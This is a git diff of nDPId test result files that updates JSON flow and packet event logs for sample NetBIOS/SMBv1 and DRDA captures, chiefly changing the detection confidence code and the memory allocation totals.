00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409797553,"flow_last_seen":1576409797553,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1576409797553,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.2","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00539{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1576409797553,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1576409797553,"pkt":"AFBW6YlWAFBWM3ieCABFAABgBwAAAIAR07fAqO+BwKjvAgCJAIkATAvHAAQpAAABAAAAAAABIEVORUVFS0ZDREpESUNBQ0FDQUNBQ0FDQUNBQ0FDQUFEAAAgAAHADAAgAAEABJPgAAYAAMCo74E="} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409797553,"flow_last_seen":1576409797553,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1576409797553,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.2","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409797553,"flow_last_seen":1576409797553,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1576409797553,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.2","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1576409797553,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1576409797553,"pkt":"AFBW6YlWAFBWM3ieCABFAABgCAAAAIAR0rfAqO+BwKjvAgCJAIkATHy8AAIpAAABAAAAAAABIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUFBAAAgAAHADAAgAAEABJPgAAaAAMCo74E="} 00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1576409797554,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1576409797554,"pkt":"AFBW6YlWAFBWM3ieCABFAABgCQAAAIAR0bfAqO+BwKjvAgCJAIkATA7DAAgpAAABAAAAAAABIEVORUVFS0ZDREpESUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAHADAAgAAEABJPgAAYAAMCo74E="} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409798047,"flow_last_seen":1576409798047,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1576409798047,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"224.0.0.2","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1576409798047,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":8,"thread_ts_msec":1576409798047,"pkt":"AQBeAAACAFBWM3ieCABFAAAcCwAAAIABn7TAqO+B4AAAAgoA9f8AAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00616{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409798047,"flow_last_seen":1576409798047,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1576409798047,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"224.0.0.2","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00616{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409798047,"flow_last_seen":1576409798047,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1576409798047,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"224.0.0.2","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00196{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":14,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409798642} 00367{"packet_event_id":1,"packet_event_name":"packet","packet_id":14,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409798047,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAV09SS0dST1VQICAgICAgHg=="} 00196{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":19,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409799428} @@ -32,14 +32,14 @@ 00367{"packet_event_id":1,"packet_event_name":"packet","packet_id":20,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409799059,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAV09SS0dST1VQICAgICAgHg=="} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409800543,"flow_last_seen":1576409800543,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1576409800543,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1576409800543,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1576409800543,"pkt":"\/\/\/\/\/\/\/\/AFBWM3ieCABFAABgEAAAAIARybrAqO+BwKjv\/wCJAIkATAq6AAQpEAABAAAAAAABIEVORUVFS0ZDREpESUNBQ0FDQUNBQ0FDQUNBQ0FDQUFEAAAgAAHADAAgAAEABJPgAAYAAMCo74E="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409800543,"flow_last_seen":1576409800543,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1576409800543,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409800543,"flow_last_seen":1576409800543,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1576409800543,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1576409800544,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1576409800544,"pkt":"\/\/\/\/\/\/\/\/AFBWM3ieCABFAABgEQAAAIARyLrAqO+BwKjv\/wCJAIkATHuvAAIpEAABAAAAAAABIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUFBAAAgAAHADAAgAAEABJPgAAaAAMCo74E="} 00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1576409800544,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1576409800544,"pkt":"\/\/\/\/\/\/\/\/AFBWM3ieCABFAABgEgAAAIARx7rAqO+BwKjv\/wCJAIkATA22AAgpEAABAAAAAAABIEVORUVFS0ZDREpESUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAHADAAgAAEABJPgAAYAAMCo74E="} 00197{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":33,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":166,"global_ts_msec":1576409802223} 00525{"packet_event_id":1,"packet_event_name":"packet","packet_id":33,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":180,"pkt_type":166,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":180,"pkt_l4_len":0,"thread_ts_msec":1576409802083,"pkt":"AwAAAAABAFBWM3ieAKbw8AMsAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAdTURKUjk4ICAgICAgICAgAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAAAAAAAAAAAAAAAhAFYAAwABAAEAAgAyAFxNQUlMU0xPVFxCUk9XU0UAAQNg6gAATURKUjk4AAAAAAAAAAAAAAQAAyBAABUEVaoA"} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409807597,"flow_last_seen":1576409807597,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1576409807597,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00726{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1576409807597,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1576409807597,"pkt":"\/\/\/\/\/\/\/\/AFBWM3ieCABFAADlJAAAAIARtTXAqO+BwKjv\/wCKAIoA0Qn+EQIADMCo74EAigC7AAAgRU5FRUVLRkNESkRJQ0FDQUNBQ0FDQUNBQ0FDQUNBQUEAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAAAAAAAAAAAAAAAhAFYAAwABAAEAAgAyAFxNQUlMU0xPVFxCUk9XU0UAAQNg6gAATURKUjk4AAAAAAAAAAAAAAQAAyBAABUEVaoA"} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409807597,"flow_last_seen":1576409807597,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1576409807597,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409807597,"flow_last_seen":1576409807597,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1576409807597,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00196{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":43,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":77,"global_ts_msec":1576409811132} 00408{"packet_event_id":1,"packet_event_name":"packet","packet_id":43,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":91,"pkt_type":77,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":91,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AFBWM3ieAAwp1HmyAE3g4AP\/\/wBKAAQAAAAAAFBWM3ieBVAAAAAAAAwp1HmyBVL\/U01CKwAAAAAAAAAAAAAAAAACAQwAAAAA0AAyAADBAwEBAAcABEhlbGxvAA=="} 00196{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":44,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":77,"global_ts_msec":1576409811517} @@ -334,10 +334,10 @@ 00368{"packet_event_id":1,"packet_event_name":"packet","packet_id":213,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409925057,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAQAAAAAAGQBXT1JLR1JPVVAgICAgICAeTUFSVElOIFJPU0VOQVUgAw=="} 00197{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":214,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409926307} 00368{"packet_event_id":1,"packet_event_name":"packet","packet_id":214,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409925057,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAQAAAAAAGQAAAAAAAAAAAAAAAAAAAAAATUFSVElOIFJPU0VOQVUgAw=="} -00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":220,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1576409798047,"flow_last_seen":1576409798047,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1576409931837,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"224.0.0.2","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":220,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1576409800543,"flow_last_seen":1576409931837,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":2176,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1576409931837,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":220,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1576409797553,"flow_last_seen":1576409928060,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":952,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1576409931837,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.2","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":220,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1576409807597,"flow_last_seen":1576409923353,"flow_idle_time":200000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":2817,"flow_avg_l4_payload_len":187,"midstream":0,"thread_ts_msec":1576409931837,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":220,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1576409798047,"flow_last_seen":1576409798047,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1576409931837,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"224.0.0.2","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":220,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1576409800543,"flow_last_seen":1576409931837,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":2176,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1576409931837,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":220,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1576409797553,"flow_last_seen":1576409928060,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":952,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1576409931837,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.2","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":220,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1576409807597,"flow_last_seen":1576409923353,"flow_idle_time":200000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":2817,"flow_avg_l4_payload_len":187,"midstream":0,"thread_ts_msec":1576409931837,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00573{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":220,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","packets-captured":220,"packets-processed":62,"total-skipped-flows":0,"total-l4-payload-len":5953,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":341,"global_ts_msec":1576409931837} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 220/62 @@ -347,9 +347,9 @@ ~~ total active/idle flows...: 4/4 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5874337 bytes -~~ total memory freed........: 5874337 bytes -~~ total allocations/frees...: 118185/118185 +~~ total memory allocated....: 6007971 bytes +~~ total memory freed........: 6007971 bytes +~~ total allocations/frees...: 120947/120947 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 200 chars ~~ json string max len.......: 1903 chars diff --git a/test/results/drda_db2.pcap.out b/test/results/drda_db2.pcap.out index 5b082a94d..bd0b21bef 100644 --- a/test/results/drda_db2.pcap.out +++ b/test/results/drda_db2.pcap.out @@ -4,8 +4,8 @@ 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1175543772220,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1175543772220,"pkt":"AAwpfMZqAFBWwAABCABFAAAwIqBAAIAGglXAqGoBwKhqgBLvw1AKtGewAAAAAHAC\/\/\/kqAAAAgQFtAEBBAI="} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1175543772221,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1175543772221,"pkt":"AFBWwAABAAwpfMZqCABFAAAwAABAAEAG5PXAqGqAwKhqAcNQEu\/9XlZHCrRnsXASFtB6IQAAAgQFtAEBBAI="} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1175543772221,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1175543772221,"pkt":"AAwpfMZqAFBWwAABCABFAAAoIqFAAIAGglzAqGoBwKhqgBLvw1AKtGex\/V5WSFAQ\/\/+9tQAA"} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1175543772220,"flow_last_seen":1175543772338,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1175543772338,"l3_proto":"ip4","src_ip":"192.168.106.1","dst_ip":"192.168.106.128","src_port":4847,"dst_port":50000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DRDA","breed":"Acceptable","category":"Database"}} -00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":38,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1175543772220,"flow_last_seen":1175543810683,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":4623,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1175543810683,"l3_proto":"ip4","src_ip":"192.168.106.1","dst_ip":"192.168.106.128","src_port":4847,"dst_port":50000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DRDA","breed":"Acceptable","category":"Database"}} 